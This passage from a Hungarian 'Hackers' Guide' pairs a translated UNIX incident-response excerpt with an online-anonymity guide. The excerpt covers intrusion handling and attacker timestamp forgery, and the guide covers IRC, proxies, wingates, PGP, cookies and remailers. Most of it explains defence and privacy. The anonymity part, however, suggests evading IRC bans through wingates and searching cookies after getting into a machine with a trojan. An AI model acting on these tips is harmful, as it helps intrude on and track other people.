üzenet azt mutatja,hogy John Q. Random loginelt,használta az su parancsot,és root<br />

lett.<br />

Ez a user egy támadó - egy támadó,aki root lett!<br />

Szerencsére,a terminálodon van egy superuser shell. Úgy döntessz,hogy a legjobb<br />

megoldás,ha a rendszeredet azonnal leállítod. Ahhoz,hogy ezt megtedd, a következõ<br />

parancsokat kell begépelned :<br />

# sync<br />

# /etc/init 0<br />

Vagy esetleg az init processnek TERM szignált küldessz :<br />

# sync<br />

# kill -TERM 1<br />

Ez az eljárás nem ajánlott a System V rendszereken,ellenben szükséges a BSD<br />

rendszereken.<br />

A döntés, hogy megállítsd a rendszert ,azon a tényen alapult lövésed sincs<br />

arról,hogy ki volt a betolakodó,mit csinált - és hogy superuserré vált.Miután a<br />

betolakodó superuser, nem tudod,hogy a rendszer mely elemeit módosította - ha<br />

módosította.<br />

Például a támadó lehet,hogy eltávolított system programokat, vagy megsemmisített<br />

logfile-okat. Úgy találod,hogy a legjobb út,ha shutdownolod a rendszert,és egy védett<br />

terminálhoz mész ahol biztosan nem járhatott a támadó,amíg próbáltad kitalálni,mi is<br />

történik.<br />

A következõ lépés, hogy kinyomtatod az összes szükséges logot - amit csak lehet(pl<br />

: konzol logok,network logok) -majd megpróbálod kitalálni,mit is csinálhatott a<br />

jogosulatlan betolakodó. Nézd meg,hogy történt-e valami szokatlan a<br />

rendszeren,miután beloginolt a támadó. Ezek a logok infokat adhatnak ,hogy a<br />

156


Hackers’ Guide<br />

támadó milyen programokat futtatott,és milyen mûveleteket,parancsokat hajtott<br />

végre.<br />

A mai logokkal ne zárd le a vizsgálatot! Ha a támadó most rootként van belépve,<br />

lehet, hogy korábban már volt accountja a gépre. Ha a logjaid egy napokkal ezelõttre<br />

is visszanyúlnak, vizsgáld át azokat is.Ha ezek backupolva vannak szalagokra, hozd<br />

vissza õket, majd vizsgáld át.<br />

Ha egy betörés után nyomozol - talán törvényes erõkkel karöltve - mindig csinálj egy<br />

backupot az egész rendszerrõl! Így lesz bizonyítékod a feltört rendszerrõl.<br />

Ha erre nincs lehetõséged, akkor a logokat mentsd el. Csinálj egy írott naplózást<br />

mindenrõl, amit csinálsz, vagy akarsz csinálni, és minden ilyen bejegyzéshez írd oda<br />

az idõpontot is!<br />

A következõ lépés kitalálni, hogyan jöhetett be a támadó, és megbizonyosodni róla,<br />

hogy többé ezt nem tudja megtenni. Vizsgáld át az egész rendszert! Ellenõrizd<br />

minden file permissionjait, és mode-ját! Keress új SUID vagy SGID programok után!<br />

Nézz bele esetleges az /etc/passwd file-ba esetleges módosítások után! Ha csináltál<br />

ellenõrzési listákat a programkönyvtáraidról, futtasd le õket,hogy változtatásokat<br />

keress!<br />

Emlékezz, hogy a betörõ nem biztos,hogy külsõ ember volt.A legtöbb ilyen incidenst<br />

az intézmény valamelyik belsõ embere okozta valamelyik user jelenlegi<br />

elérésével,vagy a sajátjával.Ha olyat tapasztalsz,hogy az aktivítás egy legitim usertõl<br />

jön, az még nem feltétlenül jelenti azt, hogy valóban a user a tettes. Lehet, hogy<br />

valaki feltörte a jelszót, és kívülrõl jött be,de lehetett belsõ ember is, aki feltörte egy<br />

másik user jelszavát.<br />

Csak miután végrehajtottad ezeket a lépéseket,és leellenõrizted ezeket az<br />

információkat,csak azután hozhatod vissza a rendszert.<br />

Soha ne higgy semminek,kivéve a hardcopyt<br />

Ha a rendszeredet kompromittálták,ne higgy semmilyen online információnak. Ha<br />

gyanús változásokat találsz a file-okban, ne higgy semminek, amit a rendszered<br />

mond neked, mert egy jó system cracker bármit megváltoztathat a gépeden. Ez<br />

furcsának tûnhet, de jobb ha talán egy kis extra idõt töltünk a fileok<br />

visszaállításával,és a detektívesdivel, mintha az esemény mégegyszer<br />

lejátszódhatna a jövõben, és a támadó újra bejöhetne.<br />

Emlékezz, egy támadó, akinek sikerül szert tennie a superuseri jogokra, bármit<br />

megtehet a rendszereden, gyakorlatilag bármilyen byteot megváltoztathat a disken. A<br />

támadó bármilyen system programot át tud írni,le tud fordítani,ki tud cserélni<br />

másikra,így a standard eszközeid nem fogják elárulni jelenlétét. A támadó patchelheti<br />

a kernelt, amelyen a gépünk futtat, kikapcsolhatja a security opcióit amelyeket<br />

te elõzõleg bekapcsoltál. A támadó bármikor megnyithatja a raw disk device-okat<br />

olvasásra és írásra.Alapvetõen, a támadó aki megszerzi a superuseri<br />

jogosultságokat, a kedvére játszadozhat a rendszereddel - ha van elég ideje,<br />

motivációja és tudása. Gyakran nincs szükségük kiemelkedõ képességekre. Ehelyett<br />

különbözõ, publikusan elérhetõ eszközöket használnak a behatoláshoz.<br />

Például tegyük fel, hogy egy fileban módosítást vélsz felfedezni és kiadod az ls -l<br />

vagy ls -la parancsot. Az utolsó módosítás ideje, amit a parancs kiírt a fájlra, nem<br />

157


Hackers’ Guide<br />

biztos, hogy valódi. Legalább négy módszer van egy támadónak,hogy hogyan<br />

módosítsa az idõt,amelyet ez a parancs adott vissza. Ezek mindegyikét a jelenlegi<br />

rendszertámadások során is szokták alkalmazni :<br />

- A támadó írhat egy programot, amely megváltoztatja a file-módosítás idejét az<br />

utimes() rendszerhívást használva.<br />

- A támadó átírhatja a rendszeridõt és dátumot a date paranccsal. A támadó<br />

módosítja a file-okat,végül visszaállítja az idõt és dátumot. Ennek a technikának az<br />

az elõnye a támadó szemszögébõl, hogy az inode elérés, és a kreációs idõ is<br />

beállítódik.<br />

- A támadó írhat a raw disk-re, megváltoztatva bármilyen tárolt idõpont értékét.<br />

- A támadó átírhatja az ls parancsot, hogy ne mutassa meg a kérdéses file(ok) valós<br />

módosítási idõpontját.<br />

A superuseri jogot szerzett támadó egyetlen limitje, hogy semmi olyat nem tud<br />

megváltoztatni, ami ki van nyomtatva egy printeren,vagy hardcopy<br />

terminálra(hardcopy rulzz! :). Ezért jó, ha van egy naplózó facilityd, ami mindig<br />

logolja, amikor a rendszeridõ ill. dátum megváltozik, és a logot hardcopy terminálra,<br />

vagy egy másik gépre másolja.<br />

Ebbõl kiindulva ajánljuk, hogy legyen kéznél jelenlegi oprendszered bootolható<br />

floppyja, hogy amikor szükséges, be tudj bootolni a floppyról, és a rendszeredet nem<br />

módosított eszközökkel tudd átvizsgálni. Ezt párosítva egy adatbázis kivonattal a<br />

módosítatlan file-okról (olyan,mint amit például a Tripwire csinál), könnyen<br />

megtalálhatod azokat a file--okat,amelyek módosítva lettek.<br />

Eredeti mû : Practical UNIX & Internet Security<br />

Fordította : Th3NmY<br />

************************************************************************************************<br />

Betörések felfedezése és kezelése VI.<br />

A rendszer visszaállítása<br />

A következõ lépés a betörés kezelésében,hogy visszahozzuk a rendszert mûködõ<br />

állapotba.Az, hogy milyen gyorsan kell visszaállítanod a rendszert illetve hogy mit<br />

szándékozol tenni a betöréssel kapcsolatban, fogja eldönteni, hogy mikor, és hogyan<br />

csináld ezt a lépést.<br />

Íme néhány tipp, nagy vonalakban :<br />

158


Hackers’ Guide<br />

- Nyomozz addig, amíg ki nem derítetted, hogyan történhetett a betörés. Zárd le a<br />

sechole-okat, majd állítsd vissza a rendszert müxödõ állapotba.<br />

- Egyszerûen foltozd és javítsd ki azokat a dolgokat, amelyek kapcsolatba hozhatók<br />

a betöréssel. Ezután állítsd vissza a rendszert, de folyamatosan monitorozz mindent.<br />

- Csinálj egy gyors scan-t és tisztítást, majd állítsd vissza a rendszert.<br />

- Hívj törvényes végrehajtót, mielõtt bármit is csinálnál, és majd õk nyomozást<br />

indítanak.<br />

- Ne csinálj semmit.<br />

Ha úgy gondolod, kijavítassz minden rést,amely a támadót beengedhette és<br />

visszaállítassz minden sérült file-t a rendszeren,nem árt ,ha vannak jó backupjaid a<br />

rendszerrõl,így egyszerûbben visszahozható a mûködési állapot.<br />

Néha elég nehéz feladat kideríteni, hogy hogyan tudott bejutni a támadó, mert a<br />

logok álltalában nem tartalmaznak elég információt arról,hogy egész pontosan mi is<br />

történhetett. Sok eszköz létezik arra az esetre is, ha esetleg reverse-engineering -et<br />

akarunk csinálni. A legtöbb behatolás egy már kompromittált user password, vagy<br />

egy bug eredményei. Ha ebben az esetben ez egy bug volt, nehéz kideríteni mi is<br />

volt az postosan, pláne ha ez egy új bug volt,ami még nem volt széles körben<br />

exploitolva. Ha system software exploit gyanú áll fenn, megpróbálhatsz kapcsolatba<br />

lépni a gyártóval, hátha tudnak segíteni. A legtöbb esetben ez segít, ha karbantartási<br />

szerzõdésed van, vagy fõvásárló vagy.<br />

Végsõ esetben megpróbálhatsz az Useneten a security groupokban,illetve a jelenlegi<br />

WWW site -okon vagy levelezõlistákon szétnézni. Gyakran lehet itt találni a<br />

különbözõ rendszerek sebezhetõségérõl információkat.<br />

Eredeti mû : Practical UNIX & Internet Security<br />

Fordította : Th3NmY<br />

************************************************************************************************<br />

Névtelenség<br />

- ...avagy "Mindenki minket figyel!" -<br />

Anonimitás<br />

Sokan azt hiszik, hogy az interneten teljes névtelenség és szabadság van... Pedig ez<br />

koránt sincs így... A másik, hogy az ember nem mondhat semmit meggondolatlanul,<br />

159


Hackers’ Guide<br />

mert a nagy testvér pillanatok alatt a .log fájlokból lenyomoz minket, aztán lehet<br />

magyarázni neki a dolgot :))) Szóval megpróbálom a saját szemszögemből leírni az<br />

egészet, amit tudok, amire érdemes odafigyelni... Főleg azért, hogy az embert ne<br />

nyomják el teljesen és hogy személyisége kellő képpen kibontakozhasson az<br />

interneten... Amennyiben bővebb információra lenne szükséged vagy valamit nem<br />

értesz, ötleted vagy tanácsod van, kérlek oszd meg velem azt e-mail formájában,<br />

illetve ha ráérsz, akkor látogass el a Hackers' Faq és a FCF és a Dodge Viper<br />

Hacker Club oldalára.<br />

Egyáltalán beszélhetünk-e névtelenségről az interneten?<br />

Sokan abban a tévhitben élnek, hogy abszolút-e névtelenek az interneten és<br />

szinte mindent megtehetnek, amit a valós világban nem... Úgy érzik, hogy teljes<br />

szabadság van a vírtuális valóságban... pedig :). Manapság számomra kicsit<br />

úgytűnik a dolog, hogy az anarchizmus legkisebb jelei sem mutatkoznak a<br />

neten, kivéve pár kivételtől... Most néhány példával szeretnem elvenni azok<br />

kedvét, akik még a függetlenség, szabadság és az abszolút anarchia<br />

ábrándjaiban élnek:<br />

1.) Vegyük elősször is elrettentő példáknak a honlapokat... Amiket ugyebár a<br />

világhálóra kötött webszerverekről töltünk le. Ez az egész úgy megy, hogy a géped a<br />

böngészőprogramodon keresztül letölti a webszerverről a fájlokat... ez a webszerver<br />

viszont van olyan kedves, és egy rakás információt meghatározott .log kiterjesztésű<br />

fájlokba elment... hátha jó lesz még valamikor :) A .log fájlok segítségével a<br />

webszerver üzemeltetője rengeteg információhoz jut veled kapcsolatban... És mint<br />

azt tudjuk, ha megvan a te valódi IP-t, akkor bizony megfogtak ;) például, (de csak a<br />

rend kedvéért) az alábbi infót szerzhetik meg :<br />

- IP címed<br />

- HOST neved<br />

- Melyik kontinensről, melyik országból illetve városból kapcsolódsz rá a világhálóra<br />

- Webböngésző programod nevét és típusát<br />

- Operációs rendszered típusát<br />

- Monitorod felbontását és színmélységét<br />

- Az előző URL címet, ahol éppen browsereddel jártál<br />

- Internet szolgáltatód nevét<br />

És persze ez csak néhány "kedvcsináló" a sok ezerből... Ezeket az adatokat persze<br />

a webszervernek önmagában nem dolga eltárolni, de különböző scriptek<br />

segítségével a kliensről a kapcsolat közben lekérdezheti és általában kérdezi :(<br />

2.) Folytassuk a sort az IRC-el... Ugye te is szoktál IRC-elni? Neked is van kedvenc<br />

csatornád? Tehát tételezzük fel, hogy éppen ebben a pillanatban fent vagy az egyik<br />

csatornán és esetleg vársz valakire. Valakivel elkezdesz beszélgetni és az illetőnek<br />

több infóra lenne szüksége veled kapcsolatban... Nem kell semmit tennie... Elég<br />

beírni a Státuszba, hogy "/whois TeBeceneved" és máris egy rakás infóhoz jut veled<br />

kapcsolatban... Itt van néhány:<br />

160


- Megtudhatja a valódi nevedet<br />

- E-mail címedet<br />

- IP címedet<br />

- HOST nevedet<br />

- Internetszolgáltatód nevét<br />

- Kontinens, ország, város nevét, ahonnan te IRC-elszg<br />

..stb. stb.<br />

Hackers’ Guide<br />

Emellett persze ott vannak az online játékok, amelyek mellett néha lehet IRC-elni<br />

web alapon... Ott is pillanatok alatt rájöhetnek az IP címedre aztán kiegyenlítik a<br />

hátrányukat ;) Persze a fairplay a legfontosabb :)))<br />

3.) Tételezzük fel, hogy az én nevem Kisbuci Illés és az e-mail címem<br />

kisbucii@mail.ISP.hu. Ez az egyik legáltalánosabb... vagyis, hogy a helyi<br />

internetszolgáltatók (ISP - Internet Service Provider) a felhasználónév választásnál a<br />

leendő ügyfeleknek azt ajánlják, hogy a teljes veztéknevükből és a keresztnevük első<br />

betűjéből álló felhasználónevet válasszák természetesen ékezet nélkül... A cégeknél<br />

is hasonló a választás, ha éppen az egyik ISP-nél fizetnek elő internet illetve e-mail<br />

szolgáltatásra... Vegyük példának az Elender feltört oldalán található jelszavakat és<br />

felhasználóneveket... A cégek általában teljes nevüket adják meg felhasználónévnek<br />

illetve a névhez még hozzátoldják a vállalati formát (pl. kempfkft@mail.isp.hu,<br />

epker@mail.isp.hu, komqa-bt@mail.isp.hu stb.) Persze ez nem örökérvényű<br />

kijelentés... vannak eltérő esetek is... amikor magánszemély az internetes nickjét<br />

választja azonosítónak... Ez persze főleg a fiatalabb korosztálynál jellemző... Sok<br />

internetszolgáltató hozzáférést biztosít könyvtáraihoz. Ahhoz, hogy valakiről<br />

megtudjunk információkat illetve, hogy beazonosíthassuk e-mail címét, nem kell<br />

többet tenni, mint ellátogatni böngészőprogramunkal a http://www.whowhere.com<br />

URL cím alá... Itt be kell pötyögni az illető vezeték illetve/vagy keresztnevét és<br />

lehetséges mail szerverének domainjét... És láss csodát... Megvan a keresett<br />

személy... Ha nem szeretnéd, hogy ilyen módon szerezzenek rólad tudomást,<br />

ajánlatos ellátogatni az oldalra és ott felvenni a kapcsolatot a whowhere.com<br />

munkatársaival...<br />

4.) Finger daemonokról csak úgy :)... Gondolom nem sokat hallottál róla? Nem<br />

kötötték az orrodra, amikor előfizettél az ISP-nél? :) Jó, mondjuk Magyarországon<br />

nagyon nem is kell, hogy az orrodra kössék, ugyanis tudomásom szerint csak egy<br />

szolgáltató futtat finger daemont... ha jól emlészem az Interware, és ott is csak annyit<br />

tudhatsz meg, hogy éppen milyen azonosítók vannak fent a neten... De külföldön<br />

egyes ISP-knél sokkal többet is... Ezek a daemonok olyan speciális programok,<br />

amelyek egy különleges, elkülönített porton/portokon várják a beérkező<br />

kapcsolatokat... A finger daemon a 79-es porton található meg... Tételezzük fel, hogy<br />

a fentebb említett Kisbuci Illés e-mail címe: kisbucii@mail.isp.hu ... Kisbuciról csak<br />

ennyit tudunk... Tehát az azonosítóját és internetszolgáltatójának nevét/domainjét...<br />

Tehát látogassunk el az internetszolgáltatóhoz a 79-es porton... Remélhetőleg van<br />

finger daemonjuk... Gépeljük be most, hogy kisbucii és láss csodát :)... Persze<br />

mégegyszer szeretném hangsúlyozni, hogy magyarországon csak egy szolgáltatónál<br />

van ilyen... Külfödön is elég ritkák... de azért előfordulnak... Egyes esetekben a finger<br />

daemonok az alábbi információval szolgálnak ügyfeleikről:<br />

- Az azonosító mögé bújt személy valódi nevéről<br />

- Mikor voltak az azonosítóval fent utoljára<br />

161


Hackers’ Guide<br />

- Ha az azonosítóval éppen fent vannak a neten, akkor ez mióta van...<br />

- Vajon van-e az illetőnek levele avagy sem...<br />

Persze ez ISP-k szerint változó... Van amelyek még a felhasználó lakcímét,<br />

telefonszámát stb. is kitálalják... Ezeket az információkat célszerű dolgokra is tudod<br />

használni...Ugye a legtöbb Instant Messanger (ICQ, AIM, YIM, MSIM) program<br />

megengedi, hogy bizonyos azonosító alatt lévő személyeket a tudtuk nélkül<br />

hozzáadhass a te "Kapcsolat listád"-hoz... Tehát megtudhatod, hogy az illető mikor<br />

online illetve offline, feltéve persze, hogy az illető mindíg futtatja Instant Messanger<br />

programját, amikor fent van a neten... Ha ismered az e-mail címét és ISP szerverén<br />

fut finger daemon, akkor megtudhatod, hogy valóban offline vagy csak nem indította<br />

el az Instant Messanger programját...<br />

IRC-nél még ajánlatos kiadni a státusz sorba a /mode TENICKED +x parancssort...<br />

Ennek segítségével ha valaki /whois TENICKED illetve /dns TENICKED parancsot<br />

bepötyögi, akkor nem tudja majd az IP/Host-odat megtudni... Persze nem minden<br />

IRC hálózatnál működik... És természetesen ha veled külön létesít DCC Chatet,<br />

akkor MS-DOS Parancssorba bepötyögött "Netstat" parancsal ki fogja azért nagy<br />

nehezen találni, hogy mi is az IP-d, Hostod...<br />

Mi az a Proxy?<br />

Elősször is szeretném leszögezni, hogy még én is csak kezdő stádiumban vagyok és<br />

nagyképűség lenne azt mondani, hogy hacker lennék... mint azt teszik néhányan<br />

csak azért, mert a kezdők valami alap kérdést kérdeznek... és ők egyből hülyének<br />

nézik őket vagy lelámázzal, bár lehet, hogy csak azért teszik ezt, mert ők sem<br />

tudják... :) Naszóval maradjuk a témánál... Éppen múltkor beszélgettem valakivel<br />

IRC-en... egy underground csatornán találkozott velem, szüksége lett volna<br />

segítségre és én mint mindig a kis tudásommal megpróbáltam segíteni... Ő kérdezte<br />

meg a társalgás közben, hogy mi is az a Proxy? Lehet, hogy egyesek tudják, de van<br />

aki még hallani sem hallott róla nagyon... Szóval a proxy szervereket elsődlegesen is<br />

azért találták ki, hogy a felhasználók internet sebességét az ISP szervere és a<br />

felhasználó gépe között felgyorsítsák... Amikor te a böngésződben szörfözöl és<br />

szeretnél megtekinteni ugye egy honlapod... elősször is bepötyögöd az oldal URL-jét<br />

a címsorba és nyomsz egy hatalmas entert... naszóval a te HTTP kérelmed nem az<br />

URL alatt lévő szerverre érkezik meg, hanem a te ISP-d proxy szerverére, ami<br />

nagyvalószínűséggel az internetszolgáltató központjában van (általában Budapest) A<br />

HTTP kérelmet a proxy szerver megvizsgálja (proxy server pl. Microsoft Proxy Server<br />

2.0, Squid/Linux)... vagyis, hogy megtekintette-e valaki az utóbbi időben a bizonyos<br />

oldalt... ha van egy másolat a szerveren az oldalról, akkor leellenőrzi a szerver, hogy<br />

a mérete és a fájl megegyezik-e vagy le kell-e tölteni... Ha megegyezik, akkor máris<br />

küldi a gépedre, ha nem, akkor elősször letölti a proxy szerverre az oldalt és onnan a<br />

te gépedre továbbítja... Ezáltal ugyebár névtelenséget biztosítanak neked a proxyk...<br />

vagyis a webszerverhez nem te juttatod el a kérelmet a letöltéssel kapcsolatban,<br />

hanem a szerver... és a proxy szerver IP-jét illetve adatait fogják látni és nem a<br />

tiedet... Persze nem akarom elvenni a kedvet, de ha nagy disznóságot csinálsz,<br />

akkor a proxy szerveren keresik vissza az infót :))) a .log fájlokból... A legtöbb hazai<br />

internetszolgáltatónak van proxy szervere, sőt ajánlják is. Ha ezzel kapcsolatban<br />

bővebb információra lenne szükséged, akkor kérdezd meg az internetszolgáltatód<br />

162


Hackers’ Guide<br />

supportját :), ahogy azt a WBT csapat is tette :))) Persze a proxykkal kapcsolatban<br />

fenntartások is felmerülhetnek egyes ISP-knél...<br />

- Legtöbb internetszolgáltató proxy szervere nem működik egyenletesen, azaz<br />

nincsenek normálisan confizva.<br />

- A weboldalak üzemeltetői a proxy alapján megtudják nézni, hogy melyik<br />

internetszolgáltató felhasználója voltál és az ISP-n keresztül ugyancsak visszatudnak<br />

utánad nyomozni. Persze vannak publikus proxy szerverek is... Ha ilyenek<br />

érdekelnek, akkor tekintsd meg http://www.cyberarmy.com/list URL alatt található<br />

publikus proxyszerverek listáját...<br />

Mi az a wingate szerver?<br />

Wingate-ek segítségével névtelen tudsz maradni az interneten. Ha találsz egy<br />

wingate szervert amire fel tudsz kapcsolódni, akkor azon keresztül tudsz másokkal<br />

kommunikálni az interneten keresztül pl. amikor IRC-lesz valakivel... Nem a te IP<br />

számodat, HOST nevedet fogják látni, hanem a wingate szerverét... azt meg<br />

nyugodtan pingelhetik :) Tehát a névtelenség mellett egy bizonyos biztonságot is<br />

nyújt neked... A wingate-ek egyik rendkívüli tulajdonságuk, hogy nagyon<br />

egyszerűek... Hogy értem ezt? Úgy hogy szinte minden géphez (még a tiedhez is)<br />

egyszerűen lehet kapcsolódni az 1080-as porton keresztül... miután kapcsolódtunk,<br />

be kell gépelni a cél-ip-címet_vagy_host-nevet (nem találomra ;)) ezek után a szerver<br />

visszaigazol... Természetesen a szerver rendszergazdája megtudja változtatni<br />

szükség esetén a wingate portot... A wingatet akkor is tudod hasznosítani ha<br />

hostodat banoltak mondjuk "nick flood" miatt a csatornáról és nem engednek fel...<br />

Akkor irány egy wingate szerver... és azon keresztül a kedvenc csati :) Persze itt<br />

szeretném felhívni a figyelmet arra is, hogy néhány IRC hálózat olyan botokat<br />

használ, ami kidobja a wingate-en keresztül csatlakozó felhasználókat... Tehát a bot<br />

megnézi, hogy a nick milyen host alatt kapcsolódott, majd megpróbál erre a hostra<br />

az 1080-as porton keresztül kapcsolódni... és ha ez sikerül neki akkor sajnos ugy<br />

repülsz az IRC hálóról, mint a Concorde repülők... Van ez így ;)<br />

Kriptográfia? Titkosítás?<br />

Mindenki valamilyen módon (legyen az egyszerű /a'la Hotmail/ vagy nehéz) eltudja<br />

valamilyen módon olvasni személyes leveleidet... Nyugodtan nem társologhatsz emailben<br />

vagy telefonon keresztül, de még IRC hálózaton illetve Instant Messangeren<br />

keresztül sem, amikor tudod, hogy a nagy testvér figyel téged... Ezért találták ki<br />

valamikor a '90-es évek elején Philip Zimmerman és társai a PGP titkosítási<br />

rendszert... Amely mára a legelterjedtebb és legismertebb "strong cryptosystem"-é<br />

vált... Elméletileg a PGP rendszert nem lehet külföldre exportálni... ezt a PGP<br />

munkatársai úgy oldották meg, hogy kinyomtatták könyv formájában a forrást és így<br />

vitték ki az USA területén kívülre... Persze ez ellen a különböző hivatalok (NSA, CIA,<br />

FBI) véresen tiltakoztak... A PGP kriptórendszer legfőbb tulajdonságai:<br />

- Az USA besorolása szerint "strong cryptosystem", azaz erős kriptográfiai<br />

rendszerek<br />

- Kulcsok segítségével történik a titkosított kommunikáció az elektronikus<br />

levelezésben<br />

163


Hackers’ Guide<br />

- Digitális aláírás készítésére alkalmas<br />

- Freeware, azaz szabadon terjeszthető... Forrása bárki számára hozzáférhető...<br />

- Lemezünk felületét tökéletesen visszaállíthatatlanul törölhetjük a PGP rendszer<br />

segítségével<br />

- Merevlemezünkön kijelölt helyen a PGP létrehoz egy PGP Disk-et, ahol minden fájl<br />

titkosítva van...<br />

A PGP-vel titkosított fájlok (főleg megfelelő kód és hosszúság esetén) csak egyes<br />

titkosszolgálatok gigantikus szuperszámítógépei tudják feltörni... és azok is csak<br />

hosszú idő után... Ajánlatos továbbá, hogyha rávetemedsz a PGP-re, akkor a<br />

kulcsod generálásánál ügyelj a következőkre:<br />

- Kulcsod hosszúsága lehetőleg 4096bites legyen<br />

- Kódod hosszúsága 20-30 karakter között legyen... és felváltva legyenek benne A-Zig,<br />

0-9-ig karakterek, illetve egyéb (#,&,@,{,},;,$,ß,÷,×,¤ stb.) karakterek, hogy minél<br />

nehezebb legyen megtörni a titkosított dokumentumot... lehetőleg csak a tartalom<br />

elévülése után :)))<br />

Cookiek<br />

Tudni akarod, hogy a weboldalak honnan szereznek veled kapcsolatban<br />

információkat, hogyan emlékeznek a becenevedre? Honnan tudják a kódodat, e-mail<br />

címedet, azt, hogy pl. egy webáruházban mit raktál be a kosárba legutoljára illetve,<br />

hogy mit vásároltál? Minderre és még számtalan kérdésre a válasz egy szó:<br />

cookiek... azaz magyarra fordítva sütik... Szóval ezek a cookiek kis fájlok, amelyek a<br />

te gépeden találhatóak, és a weboldalak a te merevlemezedről hívják meg ezeket...<br />

Ezekben rengeteg információ van veled kapcsolatban... Ezek a sütik minden<br />

op.rendszerben máshol helyezkednek el...<br />

- Windows'9x op.rendszerek esetén a "\Windows\cookies" könyvtárban...<br />

- Unix op.rendszerek esetén viszont a "/home/your-login", "/usr/your-login" vagy<br />

"/usr/local/your-login" könyvtárakban...<br />

Néhány ötlet és ajánlás a cookiekkal kapcsolatban:<br />

- Ajálatos a böngésződet úgy beállítani, hogy minden alkalommal kérdezzen rá a<br />

cookiek elfogadására...<br />

- Ha te egy nyilvános PC-ről internetezel (pl. Cyberkávézók) figyelj oda, hogy<br />

egyetlen egy cookie se maradjon a gépen, illetve ha előtted ültek, akkor nézz körül...<br />

Hátha valamelyik balfék fent hagyott néhányat ;)))<br />

- Ha sikerül trojai programmal bejutnod egy gépre, akkor ajánlatos szétnézned a<br />

cookiek körül... hátha találsz valami számodra is inycsiklandozót... :) Egyébként a<br />

cookiek az alábbi képpen épülnek fel:<br />

- NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure<br />

VALUE - a cookie neve<br />

DATE - a cookie ekkor jár le<br />

PATH és DOMAIN_NAME - melyik URL férhet hozzá a cookiehoz<br />

secure - a cookie-t biztonságos csatornában<br />

kell küldeni<br />

164


Hackers’ Guide<br />

History, bookmark, Cache<br />

Benyomok még néhány fogalmat, mint a tankönyvekben, hogy abszolút-e érthetetlen<br />

legyen az egész :).<br />

History - Megőrzi (alap esetben 30 napig) azokat az URL-eket, amelyeken jártunk. .<br />

Bookmark - A bookmark a gyakran látogatott oldalak URL-jét őrzi meg. Ha olyan<br />

oldalhoz tettünk bookmark-ot (Ctrl+D) amely login nevet és jelszót igényel, akkor a<br />

cache tartalmát vizsgálva minimum a felhasználónév megvan.<br />

Cache - A cache a böngészés felgyorsítására szolgál. Amikor letöltünk egy oldalt,<br />

akkor a böngésző az egész oldalt a hozzátartozó képekkel együtt tárolja a cache-ben<br />

(Windows operációs rendszer esetén a C:\Windows\Temporary Internet Files<br />

könyvtárban vannak ezek a fájok). Ha ugyanazt az oldalt kívánjuk újra megnézni,<br />

akkor a böngésző az oldalt a cache-ből veszi elő, nem pedig a távoli szerverről. Ha a<br />

reload gombra kattintunk (vagy F5 gomb), akkor a böngésző megnézi, hogy a távoli<br />

szerveren lévő példány frissebb-e, mint a helyi gépen tárolt, és a legutolsó változatot<br />

tölti le, olyan, mint egy házi proxy. A legtöbb böngésző a form-okba írt adatokat is<br />

eltárolja.<br />

E-mail és Anonymus remailerek?<br />

Szóval egy újabb pont, rész vagy akárminek is hívjuk, aminek segítségével<br />

információt szerezhetnek rólunk... Ha küldesz valakinek egy e-mail, akkor egy csomó<br />

infót eltárol rólad a levél... Íme egy levél "hátsó" tartalma, amit éppen egy levéllistára<br />

küldtek és így érkezett meg hozzám:<br />

Return-Path: <br />

Delivered-To: nestan@freemail.hu<br />

Received: (qmail 99176 invoked from network); 3 Aug 2000 18:33:50 +0200<br />

Received: from ho.egroups.com (208.50.99.200)<br />

by fm7.freemail.hu with SMTP; 3 Aug 2000 18:33:45 +0200<br />

X-eGroups-Return: sentto-1857759-326-965320298nestan=freemail.hu@returns.onelist.com<br />

Received: from [10.1.10.36] by ho.egroups.com with NNFMP; 03 Aug 2000 16:31:47<br />

-0000<br />

Received: (qmail 7265 invoked from network); 3 Aug 2000 16:31:35 -0000<br />

Received: from unknown (10.1.10.26) by m2.onelist.org with QMQP; 3 Aug 2000<br />

16:31:35<br />

-0000<br />

Received: from unknown (HELO fm3.freemail.hu) (194.38.105.13) by mta1 with<br />

SMTP; 3<br />

Aug 2000 16:31:25 -0000<br />

Received: (qmail 78246 invoked by uid 425920); 3 Aug 2000 18:31:20 +0200<br />

To: foldalatti@egroups.com<br />

Message-ID: <br />

X-Originating-IP: [212.40.96.15]<br />

From: Cagliostro <br />

MIME-Version: 1.0<br />

165


Hackers’ Guide<br />

Mailing-List: list foldalatti@egroups.com; contact foldalatti-owner@egroups.com<br />

Delivered-To: mailing list foldalatti@egroups.com<br />

Precedence: bulk<br />

List-Unsubscribe: <br />

Date: Thu, 3 Aug 2000 18:31:19 +0200 (CEST)<br />

Reply-To: foldalatti@egroups.com<br />

Subject: [foldalatti] All in 1 Maker for All<br />

Content-Type: multipart/mixed;<br />

boundary="0-1804289383-965320279=:78235"<br />

Ugye hogy mennyi információt rejt egy egyszerű levél az IP-től kezdve a<br />

levelezőprogram típusáig... Tehát nem elég, hogy egy ingyenes e-mail szolgáltatónál<br />

regisztrálunk magunknak postafiókot, még mást is kell tennünk, hogy az anonimitást<br />

tényleg élvezhessük... Ehhez jók az Anonymous remailerek... Ezeknek a listáját<br />

megtalálod a http://www.theargon.com URL cím alatt. Most röviden azért<br />

elmagyarázom, hogy mikép tudod használni ezeket... persze csak a rend kedvéért...<br />

Tehát elősször is menj el a http://anon.ISP.ee -re és regisztrálj be magadnak egy<br />

ingyenes azonosítót... Ha te regisztráltad magad, akkor küldj egy e-mailt a<br />

robot@anon.isp.ee -re az alábbi tartalommal:<br />

user: felhasznalo-neved<br />

pass: te-jelszavad<br />

realaddr: a-te-valodi-email-cimed<br />

realsubj: a-kuldendo-leveled-temaja<br />

És ide kerül a levél tartalma... yó mi?!<br />

Szóval itt egy példa, így kell:<br />

user: nestan<br />

pass: jolennehatudnad<br />

realaddr: i_am@thegod.com<br />

realsubj: Éljen a névtelenség mindörökké!<br />

Üdv kedves barátom!!<br />

Ez egy névtelen e-mail üzenet.<br />

Legjobb kívánsággal: I'am the God<br />

Egy kis idő után fogsz egy visszaigazoló e-mail kapni az anon.isp.ee-től, hogy<br />

leveled megérkezett... Ha ezt a levelet visszaküldöd, akkor a rendszer elküldi a<br />

kijelölt e-mail címre a levelet...<br />

Vannak persze olyan anonymous remailerek, amelyek webes felületen is<br />

elérhetőek... pl. az alábbi URL alatt: http://www.replay.com/remailer/anon.html<br />

A másik az e-mail relaying... Szóval a rosszul bekonfigurált mailserverek megengedik<br />

